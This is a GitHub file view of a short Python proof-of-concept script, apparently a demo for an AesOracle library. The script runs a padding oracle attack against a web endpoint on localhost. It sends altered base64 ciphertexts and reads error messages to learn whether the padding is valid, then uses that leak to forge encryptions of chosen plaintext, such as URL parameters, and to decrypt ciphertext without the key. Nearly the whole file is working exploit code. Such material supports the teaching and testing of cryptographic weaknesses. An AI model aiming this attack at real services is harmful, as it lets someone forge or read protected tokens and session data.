-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathExploitExample.py
46 lines (37 loc) · 1.35 KB
/
ExploitExample.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import AesOracle
import requests
import base64
if __name__ == "__main__":
url = 'http://127.0.0.1:8080/payload/%s'
ses = requests.Session()
def toWeb64(b):
return str(base64.b64encode(b),'ascii').replace('=','~').replace('+','-').replace('/','!')
def fromWeb64(s):
return base64.b64decode(s.replace('~','=').replace('-','+').replace('!','/'))
def oracle(ct):
newweb64 = toWeb64(ct)
sendurl = url % newweb64
req = ses.get(sendurl, headers={"Connection":"keep-alive"})
res = req.content
if req.status_code != 200:
raise AesOracle.PaddingOracleCracker.PaddingOracleException("server error: " + repr(req.status_code))
if not (b"adding is incorrect" in res):
return True
return False
collectedEnc = []
poc = AesOracle.PaddingOracleCracker(oracle)
collectedEnc.append(toWeb64(poc.Encrypt(b"Test")))
print(collectedEnc[-1])
b = fromWeb64(collectedEnc[-1])
cipherT = b[16 : ]
IV = b[ : 16]
orig, padded = poc.Decrypt(cipherT, IV)
print(orig)
# something more complex
collectedEnc.append(toWeb64(poc.Encrypt(b"param1=1¶m2=2¶m3=hello+world")))
print(collectedEnc[-1])
b = fromWeb64(collectedEnc[-1])
cipherT = b[16 : ]
IV = b[ : 16]
orig, padded = poc.Decrypt(cipherT, IV)
print(orig)